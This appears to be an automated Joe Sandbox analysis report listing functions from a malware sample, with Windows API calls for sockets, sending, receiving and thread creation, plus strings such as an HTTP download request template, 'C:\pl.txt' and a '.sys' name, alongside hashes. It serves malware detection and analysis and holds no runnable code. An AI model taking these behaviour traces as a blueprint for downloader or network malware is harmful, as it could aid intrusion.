                                                                                  Function 0040ECE0 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: c$f$g$i$n$o
                                                                                  • API String ID: 2102423945-2981107110
                                                                                  • Opcode ID: 31b406384824c665cf59bd80d75fbe58aff0e9b379675f445ff5386dd24af425
                                                                                  • Instruction ID: fbad16f17c750e991d6b8cd7a1c7bda227d89ad4767bf022bc4cd420e34e7a86
                                                                                  • Opcode Fuzzy Hash: 31b406384824c665cf59bd80d75fbe58aff0e9b379675f445ff5386dd24af425
                                                                                  • Instruction Fuzzy Hash: 76012B70D0838CAAEB04D7A5D806BDCBBA94B1470CF0044DD91446A2C2E6FA0758C7B6
                                                                                  Function 6A6E4A40 Relevance: 13.6, APIs: 9, Instructions: 116networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 6A6E4A65
                                                                                  • ioctlsocket.WS2_32 ref: 6A6E4A81
                                                                                  • htons.WS2_32(?), ref: 6A6E4AB1
                                                                                  • inet_addr.WS2_32(?), ref: 6A6E4AE5
                                                                                  • connect.WS2_32(?,?,00000010), ref: 6A6E4B00
                                                                                  • WSAGetLastError.WS2_32 ref: 6A6E4B11
                                                                                  • select.WS2_32(?,00000000,?,?,?), ref: 6A6E4B77
                                                                                  • __WSAFDIsSet.WS2_32(?,00000001), ref: 6A6E4B98
                                                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 6A6E4BB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastconnecthtonsinet_addrioctlsocketselectsocket
                                                                                  • String ID:
                                                                                  • API String ID: 1968875722-0
                                                                                  • Opcode ID: 5f111ca7fa1901c541a3d1ef62be91d6d5e4a406dc8c85563905c3401b89b015
                                                                                  • Instruction ID: 42f6c60c48d4a06d8dc206bcd97c5792baece590fa4a3403b7fc65a7aa3482db
                                                                                  • Opcode Fuzzy Hash: 5f111ca7fa1901c541a3d1ef62be91d6d5e4a406dc8c85563905c3401b89b015
                                                                                  • Instruction Fuzzy Hash: FA415CB16093419FD710CF65C88DB9BB7E5FB88308F008A2DF998C7244EBB4A905CB52
                                                                                  Function 00435630 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 420networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00435674
                                                                                  • select.WS2_32(?,?,00000000,00000000,00000000,00000003), ref: 00435755
                                                                                  • recv.WS2_32(00000000,?,00000000,00000001,00000000), ref: 004357B5
                                                                                  • _strncmp.LIBCMT ref: 00435844
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strncmprecvselect
                                                                                  • String ID: @
                                                                                  • API String ID: 1671173849-2766056989
                                                                                  • Opcode ID: eda6fb0f9cc337b095eec4e0b488b80722caaf1642d559a3ab4ac252c625263d
                                                                                  • Instruction ID: 3a526e49930324852a7e243cdad9b60358e505a53e0923004bce11fb8a4367ec
                                                                                  • Opcode Fuzzy Hash: eda6fb0f9cc337b095eec4e0b488b80722caaf1642d559a3ab4ac252c625263d
                                                                                  • Instruction Fuzzy Hash: 95124AB0D00A189FCB24DB94DC81BEEB7B5AF88305F5091DAE409A7281DB346E85CF59
                                                                                  Function 00420770 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 194windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00420842
                                                                                  • _memset.LIBCMT ref: 0042085F
                                                                                  • SendMessageA.USER32(00000000,000083F6,00000000,00000000), ref: 0042092E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$MessageSend
                                                                                  • String ID: $?-@$?-@
                                                                                  • API String ID: 2497471678-4072660992
                                                                                  • Opcode ID: 634a1cbdfc2b5bdcba8a346ac5e3b2700226df0caad08a3800da518808c11720
                                                                                  • Instruction ID: 11211ead35c8b724013bbb20a2679fd58de00ddc3694071f7510e8182bc71cf6
                                                                                  • Opcode Fuzzy Hash: 634a1cbdfc2b5bdcba8a346ac5e3b2700226df0caad08a3800da518808c11720
                                                                                  • Instruction Fuzzy Hash: C6816271A002199FDB24DF58DC89FDAB7B5FF48704F1441E9E508AB282D778AA84CF94
                                                                                  Function 6A6D2150 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • C:\pl.txt, xrefs: 6A6D21AB
                                                                                  • SetExeVerInfo : guaType: %d, bFree: %d, exeVerNum: %d, xrefs: 6A6D2197
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_sprintf
                                                                                  • String ID: C:\pl.txt$SetExeVerInfo : guaType: %d, bFree: %d, exeVerNum: %d
                                                                                  • API String ID: 970810673-3464333151
                                                                                  • Opcode ID: 311974cf6ffa9862b7ba87b0411f90c3e497015d881fd0ac18595116d72e3581
                                                                                  • Instruction ID: 238de4121edc3b947afd74184b3b3572a8f00a85867a53d677d7c22489c4c792
                                                                                  • Opcode Fuzzy Hash: 311974cf6ffa9862b7ba87b0411f90c3e497015d881fd0ac18595116d72e3581
                                                                                  • Instruction Fuzzy Hash: 5611C6B2408240ABD720DB64CC89FDBB7E8AFD9704F05481DF28897240DE74E948CB92
                                                                                  Function 0041E210 Relevance: 11.1, APIs: 2, Strings: 4, Instructions: 641windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000170,?,00000000), ref: 0041E553
                                                                                    • Part of subcall function 00415E70: _memset.LIBCMT ref: 00415EAF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend_memset
                                                                                  • String ID: $ $P$Z
                                                                                  • API String ID: 1827994538-915915091
                                                                                  • Opcode ID: 6138925614e44b7036af9950186c6c0d5f8e9c87f61dab8b271d1ddee897413a
                                                                                  • Instruction ID: cd5c58f4a2c2d7ce5841aecd081ea34ffaec48f60b483f6b426694fc332caa7c
                                                                                  • Opcode Fuzzy Hash: 6138925614e44b7036af9950186c6c0d5f8e9c87f61dab8b271d1ddee897413a
                                                                                  • Instruction Fuzzy Hash: 2D42EAB5A10218EFDB14DFD8C995FEEB7B5BF88300F24424DE505BB286C674A942CB64
                                                                                  Function 00437A40 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 544COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 00437A5E
                                                                                    • Part of subcall function 0046A7E7: __FF_MSGBANNER.LIBCMT ref: 0046A80A
                                                                                    • Part of subcall function 0046A7E7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80,0000000C,0047632D), ref: 0046A85E
                                                                                  • _memset.LIBCMT ref: 00437A83
                                                                                  • _rand.LIBCMT ref: 00437AA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_malloc_memset_rand
                                                                                  • String ID: <
                                                                                  • API String ID: 1602865748-4251816714
                                                                                  • Opcode ID: a004f23b9767efeb3f5eb4b95d2afdaaff47dae06db57c16e4a574300fb5638f
                                                                                  • Instruction ID: aa922aa5a59bad9ad8c96008a8bc75633e6335292c325f6f06088b6bf98f482a
                                                                                  • Opcode Fuzzy Hash: a004f23b9767efeb3f5eb4b95d2afdaaff47dae06db57c16e4a574300fb5638f
                                                                                  • Instruction Fuzzy Hash: A332E9B4A04218DFDB14CF98C891B9EBBF5FF99304F20815AE809AB391D774A942CF55
                                                                                  Function 00432ED0 Relevance: 10.7, APIs: 7, Instructions: 193COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1579825452-0
                                                                                  • Opcode ID: 723ba6ee8635e4f21ac800e3097cc2850f7a546d62ec6fcb4789608c9878666e
                                                                                  • Instruction ID: f7ee4b597200e15b37681a59ce08f7fc7517185ceee8e46c6228237e4240cea4
                                                                                  • Opcode Fuzzy Hash: 723ba6ee8635e4f21ac800e3097cc2850f7a546d62ec6fcb4789608c9878666e
                                                                                  • Instruction Fuzzy Hash: BB81A1B1E00109DFDB08DF94D981BAEB7B5FF58304F20852EE115AB281E778AA41CF95
                                                                                  Function 6A6E1100 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DBAF0: _memset.LIBCMT ref: 6A6DBB23
                                                                                    • Part of subcall function 6A6DBAF0: _memset.LIBCMT ref: 6A6DBB46
                                                                                  • _memset.LIBCMT ref: 6A6E1181
                                                                                  • _memset.LIBCMT ref: 6A6E1195
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 6A6E11F6
                                                                                  • _strncpy.LIBCMT ref: 6A6E1286
                                                                                  • _strncpy.LIBCMT ref: 6A6E12A9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_strncpy$DirectoryWindows
                                                                                  • String ID: .sys
                                                                                  • API String ID: 4209668992-15676193
                                                                                  • Opcode ID: 1649ba87d543546dc257a3c62752341b5728a8f0c2a14ad8d79f5ef6108cb1d9
                                                                                  • Instruction ID: 9c317232622879445e4f6de2ff32ef24d29a370cf19e63b37f9bcb45271c27da
                                                                                  • Opcode Fuzzy Hash: 1649ba87d543546dc257a3c62752341b5728a8f0c2a14ad8d79f5ef6108cb1d9
                                                                                  • Instruction Fuzzy Hash: 7C51D17020C3859FC305DF7888686EBBBE6BBD9304F44896DE4CAC7211EB719949D792
                                                                                  Function 004361B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: socket
                                                                                  • String ID: P
                                                                                  • API String ID: 98920635-3110715001
                                                                                  • Opcode ID: 0aeba45f5bfc29ccab774574c1352923785260cb9f0baacc52e25d24f754a2d1
                                                                                  • Instruction ID: ba58f892b5188a90b876a42170d2208b43fcf0872a1e877e38941ec49fc22c1c
                                                                                  • Opcode Fuzzy Hash: 0aeba45f5bfc29ccab774574c1352923785260cb9f0baacc52e25d24f754a2d1
                                                                                  • Instruction Fuzzy Hash: 76516070D01219ABDB24EF55DD95BEEB3B4AF48308F0050DEE50967282EB389E88CF55
                                                                                  Function 00435F60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: socket
                                                                                  • String ID: P
                                                                                  • API String ID: 98920635-3110715001
                                                                                  • Opcode ID: 94d6a08f3dfc4441600006c1e90349ba11aa45ec648fbfddb3f069c3d6ff6e36
                                                                                  • Instruction ID: 479eb7cc5ae85fa3d2f3798be4b3bfc3d6bd3fc69b8aff8827d85eac13f0edad
                                                                                  • Opcode Fuzzy Hash: 94d6a08f3dfc4441600006c1e90349ba11aa45ec648fbfddb3f069c3d6ff6e36
                                                                                  • Instruction Fuzzy Hash: 4A514D70901219ABDF24EF55DD95BEEB3B5AF48308F0050DED10967282EB789E888F55
                                                                                  Function 6A6E4BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E4C34
                                                                                  • _sprintf.LIBCMT ref: 6A6E4CB6
                                                                                  • select.WS2_32 ref: 6A6E4D07
                                                                                  • send.WS2_32(?,?,00000000,00000000), ref: 6A6E4D22
                                                                                  • WSAGetLastError.WS2_32(?,00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 6A6E4D2C
                                                                                  Strings
                                                                                  • GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive, xrefs: 6A6E4CB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_memset_sprintfselectsend
                                                                                  • String ID: GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive
                                                                                  • API String ID: 2026077180-3218760813
                                                                                  • Opcode ID: 208df761e485db15644ae50c435b140b15b4251a514077229820cecbe9ce2e46
                                                                                  • Instruction ID: 2acb3913ff2ff7c2fb5a2b2ff7aac79e86b926ed516011f7482839a53cb04438
                                                                                  • Opcode Fuzzy Hash: 208df761e485db15644ae50c435b140b15b4251a514077229820cecbe9ce2e46
                                                                                  • Instruction Fuzzy Hash: 7741AF71609605AFD720CF78CC88BABB7E5FB89708F01892CE54987285EB71F9058F51
                                                                                  Function 6A6FDD47 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 6A6FDD7C
                                                                                  • __calloc_crt.LIBCMT ref: 6A6FDD88
                                                                                  • __getptd.LIBCMT ref: 6A6FDD95
                                                                                  • CreateThread.KERNEL32(00000000,6A6DD720,6A6FDCD0,00000000,00000004,00000000), ref: 6A6FDDBB
                                                                                  • ResumeThread.KERNELBASE(00000000,?,?,6A6D1503,6A6DD720,00000000,00000000), ref: 6A6FDDCB
                                                                                  • GetLastError.KERNEL32(?,?,6A6D1503,6A6DD720,00000000,00000000), ref: 6A6FDDD6
                                                                                  • __dosmaperr.LIBCMT ref: 6A6FDDEE
                                                                                    • Part of subcall function 6A701068: __getptd_noexit.LIBCMT ref: 6A701068
                                                                                    • Part of subcall function 6A700D34: __decode_pointer.LIBCMT ref: 6A700D3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1269668773-0
                                                                                  • Opcode ID: db9b9bd33cd52304390992635dbdd2a80597863c850f5dfa68bcfc9d5c9d348d
                                                                                  • Instruction ID: 11d30f1d138c2ce03e0077173d90e9f5fa32e035c7fdfea33c2a8f56b5990b54
                                                                                  • Opcode Fuzzy Hash: db9b9bd33cd52304390992635dbdd2a80597863c850f5dfa68bcfc9d5c9d348d
                                                                                  • Instruction Fuzzy Hash: 5D11E6B2502244FFDB105FB9DD8888E7BF6EF4233CB120A29F124931C1DF70A9029A60
                                                                                  Function 6A6F4906 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00000000,00000000,?,6A6EDFB1,?,00000000,6A71B745,00000000), ref: 6A6F4914
                                                                                  • SetErrorMode.KERNELBASE(00000000,?,6A6EDFB1,?,00000000,6A71B745,00000000), ref: 6A6F491C
                                                                                    • Part of subcall function 6A6F30B8: GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 6A6F30F0
                                                                                    • Part of subcall function 6A6F30B8: SetLastError.KERNEL32(0000006F), ref: 6A6F3107
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,6A6EDFB1,?,00000000,6A71B745,00000000), ref: 6A6F496B
                                                                                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6A6F497B
                                                                                    • Part of subcall function 6A6F4780: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?,00000000), ref: 6A6F47BD
                                                                                    • Part of subcall function 6A6F4780: PathFindExtensionA.SHLWAPI(?), ref: 6A6F47D7
                                                                                    • Part of subcall function 6A6F4780: __strdup.LIBCMT ref: 6A6F481F
                                                                                    • Part of subcall function 6A6F4780: __strdup.LIBCMT ref: 6A6F485E
                                                                                    • Part of subcall function 6A6F4780: __strdup.LIBCMT ref: 6A6F48A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
